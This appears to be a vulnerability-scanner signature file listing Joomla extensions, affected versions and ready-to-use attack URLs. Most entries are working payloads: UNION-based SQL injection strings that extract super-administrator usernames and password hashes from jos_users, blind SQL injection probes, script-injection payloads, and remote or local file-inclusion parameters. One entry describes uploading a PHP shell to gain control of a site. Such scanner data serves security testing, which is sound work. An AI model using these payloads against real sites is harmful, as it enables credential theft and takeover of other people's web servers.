Component: BazaarBuilder Shopping Cart Software (com_prod) SQL Injection Vulnerability Versions effected: 5.0<= |/components/com_prod/|/index.php?option=com_prod&task=products&cid=-9999%20union%20all%20select%201,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+/*+
Component: com_beamospetition XSS  Vulnerability Versions effected: 1.0.12|/components/com_beamospetition/|/index.php?option=com_beamospetition&func=sign&pet='><script>alert(1)</script>
Component: beamospetition SQL Injection Vulnerability variant 2 Version Affected: N/A|/components/com_beamospetition/|/index.php?option=com_beamospetition&func=sign&mpid=-9999'%20union%20select%200,1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_flashmagazinedeluxe SQL Injection Vulnerability Versions effected: N/A|/components/com_flashmagazinedeluxe/|/index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+union+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: pcchess Blind SQL Injection Vulnerability	  Versions effected: N/A|/components/com_pcchess/|/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
Component: PC CookBook Blind  SQL Injection Vulnerability 	Versions effected: N/A|/components/com_pccookbook/|/index.php?option=com_pccookbook&page=viewrecipe&recipe_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
Component: com_waticketsystem Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_waticketsystem/|/index.php?option=com_waticketsystem&act=category&catid=1+and+1=1::/index.php?option=com_waticketsystem&act=category&catid=1+and+1=2
Component: com_eventing Blind SQL Injection Vulnerability Versions effected: 1.6.x|/components/com_eventing/|/index.php?option=com_eventing&catid=1+and+1=1::/index.php?option=com_eventing&catid=1+and+1=2
Component: com_sitemap Remote File Inclusion  Vulnerability Versions effected: N/A|/components/com_sitemap/sitemap.xml.php|/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
Component: com_rss DOS  Vulnerability Versions effected: Joomla! <= 1.0.7|/components/com_rss/|/index2.php?option=com_rss&feed=test
Component: com_Jambook Remote File Inclusion Vulnerability Versions effected: 1.0 beta7|/components/com_Jambook/jambook.php|/components/com_Jambook/jambook.php?mosConfig_absolute_path=
Component: com_akogallery SQL Injection Vulnerability Versions effected: N/A|/components/com_akogallery|/index.php?option=com_akogallery&Itemid=1&func=detail&id=-334455+union+select+null,null,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_gsticketsystem (catid) Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_gsticketsystem/|/index.php?option=com_gsticketsystem&controller=entrypoint&task=viewCategory&catid=1+and+1=1::/index.php?option=com_gsticketsystem&controller=entrypoint&task=viewCategory&catid=1+and+1=2
Component:  com_casino_blackjack SQL Injection Vulnerability Versions effected: 0.3.1 <=|/components/com_casino_blackjack/|/index.php?option=com_casino_blackjack&game_mode=Blackjack&shuffle=1&Itemid=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_casinobase SQL Injection Vulnerability Versions effected: 0.3.1 <=|/components/com_casinobase/|/index.php?option=com_casinobase&Itemid=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_casino_videopoker SQL Injection Vulnerability Versions effected: 0.3.1 <=|/components/com_casino_videopoker/|/index.php?option=com_casino_videopoker&Itemid=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_agoragroup AgoraGroup Blind SQL Injection Vulnerability Versions effected:  0.3.5.3 <=|/components/com_agoragroup/|/index.php?option=com_agoragroup&con=groupdetail&id=1+and+1=1::/index.php?option=com_agoragroup&con=groupdetail&id=1+and+1=2
Component:  com_jvideo SQL Injection Vulnerability Versions effected: 0.3.x|/components/com_jvideo/|/index.php?option=com_jvideo&view=user&user_id=62+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Seminar com_seminar Blind SQL Injection Vulnerability Versions effected: 2.0.4 <=|/components/com_seminar/|/index.php?option=com_seminar&task=View_seminar&id=1+and+1=1::index.php?option=com_seminar&task=View_seminar&id=1+and+1=2
Component:  Omilen Photo Gallery LFI Vulnerability Versions effected: 0.5b <=|/components/com_omphotogallery/|/index.php?option=com_omphotogallery&controller=
Component:  RFI Vulnerability Versions effected: 2.1b7 <=|/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php|/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=
Component:  com_bsadv Boy Scout Advancement SQL Injection Vulnerability Versions effected: 0.3 <=|/components/com_bsadv/|/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,concat(username,0x3a,password),3,4+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_rsgallery2 Attacker's Backdoored Vulnerability Versions effected: legacy_1.14.3, 2.0.0b1|/components/com_rsgallery2/|According to joomlacode.org, the svn account of the author was hacked and attacker injected remote command execution backdoor. If you have access to the source code, search & examine for eval, exec in /components/rsallery2
Component:  com_agora Remote File Upload Vulnerability Versions effected: 3.0.0 <=|/components/com_agora/|Requires Member registration to verify.  After registration, go to site.com/index.php?option=com_agora&task=upload and upload a php shell. Check if it's at /components/com_agora/img/members/0/yourshell.php.
Component:  com_juser SQL Injection Vulnerability Versions effected: N/A|/components/com_juser/|/index.php?option=com_juser&task=show_profile&id=+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_mosres (property_uid) SQL Injection Vulnerability Versions effected: 4.5.2 <=|/components/com_mosres/|/index.php?option=com_mosres&task=viewproperty&property_uid=99+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_school SQL Injection Vulnerability Versions effected: 1.4 <=|/components/com_school/|/index.php?option=com_school&Itemid=null&func=showclass&classid=99+union+select+concat(username,0x3a,password),null+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_moofaq MooFAQ LFI Vulnerability Versions effected: 1.0 <=|/components/com_moofaq/|/components/com_moofaq/includes/file_includer.php?gzip=0&file=
Component:  com_portafolio (cid) SQL Injection Vulnerability Versions effected: N/A|/components/com_portafolio/|/index.php?option=com_portafolio&task=viewcat&cid=-1+and+1=2+union+select+1,2,3,4,5,6,7,0x3A6166626337346430363332333063626162356432393066646130393633636537,9--&Itemid=5
Component:  com_booklibrary RFI Vulnerability Versions effected: 1.5.2.4 <=|/components/com_booklibrary/|/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=
Component:  com_media_library RFI Vulnerability Versions effected: 1.5.3 <=|/components/com_media_library/|/com_media_library/toolbar_ext.php?mosConfig_absolute_path=
Component:  RFI Vulnerability Versions effected: N/A|/components/com_realestatemanager/|/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=
Component:  com_vehiclemanager RFI Vulnerability Versions effected: 1.0 <=|/components/com_vehiclemanager/|/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=
Component:  com_projectfork LFI Vulnerability Versions effected: 2.0.10 <=|/components/com_projectfork/|/index.php?option=com_projectfork&section=
Component: com_ijoomla_rss Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_ijoomla_rss/|/index.php?option=com_ijoomla_rss&act=xml&cat=1+and+1=1::/index.php?option=com_ijoomla_rss&act=xml&cat=1+and+1=2
Component: com_jumi (fileid) Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_jumi/|/index.php?option=com_jumi&fileid=1+and+1=1::/index.php?option=com_jumi&fileid=1+and+1=2
Component:  com_tickets (id) SQL Injection Vulnerability Versions effected: N/A|/components/com_tickets/|/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_pinboard Remote File Upload Vulnerability Versions effected: N/A|/components/com_pinboard/|/components/com_pinboard/popup/popup.php?option=showupload
Component: com_amocourse (catid) SQL Injection Vulnerability Versions effected: N/A|/components/com_amocourse/|/index.php?option=com_amocourse&task=view&view=category&catid=1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_pinboard SQL Injection Vulnerability Versions effected: N/A|/components/com_pinboard/|/index.php?option=com_pinboard&Itemid=1&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,concat(username,0x3a,password),8,9,10%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_bookflip(book_id) SQL Injection Vulnerability Versions effected: 2.1 <=|/components/com_bookflip/|/index.php?option=com_bookflip&book_id=-9999+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_k2 (sectionid) SQL Injection Vulnerability Versions effected: 1.0.1 Beta <=|/components/com_k2/|/index.php?option=com_k2&view=itemlist&category=null'+and+1=2+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_php (id) Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_php/|/index.php?option=com_php&Itemid=[INSERT]&id=[INSERT]+and+1=1::/index.php?option=com_php&Itemid=[INSERT]&id=[INSERT]+and+1=2
Component:  mod_letterman XSS Vulnerability Versions effected: 1.2.4 <=|/components/mod_letterman/|/index.php?option=com_letterman&task=view&id=1&Itemid=1%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Component: com_googlebase VirtueMart  RFI Vulnerability Versions Affected: 1.1 <= |/components/com_googlebase/|/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=
Component: com_googlebase VirtueMart  RFI Vulnerability Versions Affected: 1.1 <= |/administrator/components/com_googlebase/|/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=
Component: J! Reactions RFI Vulnerability Versions Affected: 1.8.1 <= |/administrator/components/com_jreactions/|/administrator/components/com_jreactions/langset.php?comPath=
Component:  mosListMessenger com_lmo SQL Injection Vulnerability Versions effected: 2.1.0 <=|/components/com_lm/|/index.php?option=com_lms&task=showTests&cat=-1+union+select+1,concat(username,0x3a,password),3,4,5,6,7+from jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_akobook (gbid) Guestbook SQL Injection Vulnerability Versions effected: SE 2.3 <= |/components/com_akobook/|N/A 
Component: com_akobook Guestbook XSS Vulnerability Versions effected: SE 3.42 <= |/components/com_akobook/|Input passed to the "gbmail"/"gbpage" parameters in the signing page (generally index.php?option=com_akobook&func=sign) is not properly santised. Submit gbmail as a' onblur=alert(0) a='. To confirm, go back signing page. Click the mail input box. Press tab and you got XSS.
Component:  com_propertylab (auction_id) SQL Injection Vulnerability Versions effected: N/A|/components/com_propertylab/|/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_mailarchive XSS Vulnerability Versions effected: N/A|/components/com_mailarchive/|/index.php?option=com_mailarchive&Itemid=212&view=EXP&perpage=20&revdate=on&datestart=&dateend=&author="><script>alert(0)</script>&subject="><script>alert(0)</script>&exactsubject="><script>alert(0)</script>&search=&submit=Apply
Component: com_journal XSS  Injection Vulnerability Versions effected: N/A|/components/com_journal/|/index.php?option=com_journal&Itemid=213&page=index&journal=default&view=FULL&logfile=ALL&icon=ALL&version=ALL&buildstart=&buildend=&perpage=20&search="><script>alert(0)</script>&find=Find
Component: com_simplefaq SQL Injection Vulnerability Versions effected: N/A|/components/com_simplefaq/|/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,0,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_gallery SQL Injection Vulnerability Versions effected: N/A|/components/com_gallery/|/index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,concat (username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_category (cat_id) SQL Injection Vulnerability Versions effected: N/A|/components/com_category/|/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_jobline (search) Blind SQL Injection Vulnerability Versions effected: 1.3.1 <=|/components/com_jobline/|/index.php?option=com_jobline&task=results&Itemid=&search=%' and 1=1 and '%'='::/index.php?option=com_jobline&task=results&Itemid=&search=%' and 1=2 and '%'='
Component:  com_knowledgebase addon FCKEditor  Abuse of Functionalities Vulnerability Versions effected: 2.6.1.4 <=|/components/com_knowledgebase/fckeditor/fckeditor.js|Certain versions of FCKeditor have multiple security vulnerabilities.
Component: X-Shop RFI Vulnerability Versions Affected: 1.7 <= |/administrator/components/com_x-shop/|/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=
Component: Taskhopper (com_thopper) RFI Vulnerability Versions effected: 1.1 <=|/components/com_thopper/|/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
Component:  com_asortyment (katid) SQL Injection Vulnerability Versions effected: N/A|/components/com_asortyment/|/index.php?option=com_asortyment&Itemid=36&lang=pl&task=kat&katid=-9999999+union+select+0,concat(username,0x3a,password),2,3,4,5,6,7,8,9+from+jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_awesom SQL Injection Vulnerability Versions effected: N/A|/components/com_awesom/|/index.php?option=com_awesom&Itemid=99&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_be_it_easypartner RFI  Vulnerability Versions effected: N/A|/components/com_be_it_easypartner/|/components/com_be_it_easypartner/be_it_easypartner.ajax.php?mosConfig_absolute_path=
Component:  com_blog (pid) SQL Injection Vulnerability Versions effected: N/A|/components/com_blog/|/index.php?option=com_blog&name=aria-Security.Net&task=view&pid=\x27\x6F\x72 SELECT *
Component:  com_activities SQL Injection Vulnerability Versions effected: N/A|/components/com_activities/|/index.php?option=com_activities&Itemid=51&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_catalogshop SQL Injection Vulnerability Versions effected: 1.0 beta 1 <=|/components/com_catalogshop/|/index.php?option=com_catalogshop&Itemid=99&func=detail&id=-1/**/union/**/select/**/null,null,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_guideSQL Injection Vulnerability Versions effected: N/A|/components/com_guide/|/index.php?option=com_guide&category=-999999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_clickheat  RFI Vulnerability Versions effected: N/A|/components/com_ clickheat/|/index.php?option=com_ clickheat&task=
Component:  com_clickheat XSS Vulnerability Versions effected: N/A|/components/com_clickheat/|/index.php?option=com_ clickheat&task=http://ha.ckers.org/xss.js
Component:  Community Exchange com_cx (user_id) SQL Injection Vulnerability Versions effected: 1.0.0 <=|/components/com_cx/|/index.php?option=com_cx&task=showrating&user_id=-3+union+select+1,concat(username,0x3a,password),3+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_eventlist (did) SQL Injection Vulnerability Versions effected: 0.8 <=|/components/com_eventlist/|/index.php?option=com_eventlist&func=details&did=9999999999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_estateagent SQL Injection Vulnerability Versions effected: 0.1 <=|/components/com_estateagent/|/index.php?option=com_estateagent&Itemid=99&func=showObject&info=contact&objid=-9999/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*&results=null
Component:  com_downloads(cat) SQL Injection Vulnerability Versions effected: N/A|/components/com_downloads/|/index.php?option=com_downloads&Itemid=99&func=selectcat&cat=-1/**/union/**/select/**/0,concat(username,0x3a,password),2/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*  
Component:  com_detail(cat) SQL Injection Vulnerability Versions effected: N/A|/components/com_detail/|/index.php?option=com_detail&Itemid=99&id=-1/**/union/**/select/**/0,1,2,3, /index.php?option=com_downloads&Itemid=null&func=selectcat&cat=-1/**/union/**/select/**/0,concat(username,0x3a,password),2,3/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_datsogallery SQL Injection Vulnerability Versions effected: 1.3.1 <=|/components/com_datsogallery/|/index.php?option=com_datsogallery&func=detail&id=-999+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,1,2,3,4,5+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: Dada Mail Manager Component Remote File Inclusion Vulnerability   Version Affected:   2.6 <= |/administrator/components/|/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Component: Facile Forms RFI Vulnerability	Versions Affected: N/A|/components/com_facileforms/|/components/com_facileforms/facileforms.frame.php?ff_compath=
Component:  com_foevpartners SQL Injection Vulnerability Versions effected: N/A|/components/com_foevpartners/|/index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_inter SQL Injection Vulnerability Versions effected: N/A|/components/com_inter/|/index.php?option=com_inter&op=The-0utl4wz&id=-11111111111111/**/union/**/select/**/0,1,2,3,concat(username,0x3a,password),5,6,7,8,9/**/from/**/jos_user+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_emcomposer SQL Injection Vulnerability Versions effected: N/A|/components/com_emcomposer/|N/A
Component:  com_ixxocart SQL Injection Vulnerability Versions effected: 3.9.6.1 <|/components/com_ixxocart/|/index.php?option=com_ixxocart&Itemid=1&p=catalog&parent=1\x27\x4F\x52+SELECT+*&pg=1
Component:  com_publication SQL Injection Vulnerability Versions effected: N/A|/components/com_publication/|/index.php?option=com_publication&task=view&pid=-9999999+union/**/select+0,concat(username,0x3a,password),0,0,0,0,0/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_lexikon SQL Injection Vulnerability Versions effected: N/A|/components/com_lexikon/|/index.php?option=com_lexikon&id=-1/**/union/**/select/**/0,concat(username,0x3a,password),2/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/* 
Component:  com_filebase SQL Injection Vulnerability Versions effected: N/A|/components/com_filebase/|/index.php?option=com_filebase&Itemid=-999&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),1,2/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: Almond Classifieds com_aclassf (id) Blind SQL Injection Vulnerability Versions effected: 5.6.2  <=|/components/com_aclassf/|/index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=1::/index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=2
Component: Almond Classifieds com_aclassf (replid) Blind SQL Injection Vulnerability Versions effected: 7.5  <=|/components/com_aclassf/|/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=1::/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=2
Component: Almond Classifieds com_aclassf (addr) XSS Vulnerability Versions effected: 7.5  <=|/components/com_aclassf/|/components/com_aclassf/gmap.php?addr="><script>alert(1)</script>
Component:  com_pms SQL Injection Vulnerability Versions effected: 2.0.4 <=|/components/com_pms/|Requires valid user account on the target site. See for more information -> http://milw0rm.com/exploits/9398
Component:  com_joomloads SQL Injection Vulnerability Versions effected: N/A|/components/com_joomloads/|/index.php?option=com_joomloads&view=package&Itemid=2&packageId=-156+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--
Component: Kunena Forums com_kunena (func) Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_kunena/|/index.php?option=com_kunena&Itemid=-3&func=1+and+1=1::/index.php?option=com_kunena&Itemid=-3&func=1+and+1=2
Component:  com_misterestate Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_misterestate/|/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=1::/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=2
Template: be2004-2 File Inclusion Vulnerability   Versions Affected: 2 <= |/templates/be2004-2/|/templates/be2004-2/index.php?mosConfig_absolute_path=
Module: AutoStand Category mod_as_category     File Inclusion Vulnerability     Versions Affected: 1.x <= |/modules/mod_as_category.php|/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=
Module: Quick Question module    Versions Affected: 4.5.1 <= |/modules/mod_quick_question.php|N/A
Module: Module mod_pxt     File Inclusion Vulnerability     Versions Affected: N/A     |/modules/mod_pxt/|/modules/mod_pxt/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=
Module: mod_calendar    File Inclusion Vulnerability     Versions Affected: N/A|/modules/mod_calendar.php|/modules/mod_calendar.php?absolute_path=
Extension:  UIajaxIM XSS Vulnerability Versions effected: 1.1 <=|/ajaxim/|Requires valid user account on the target site. See for more information -> http://milw0rm.com/exploits/9244
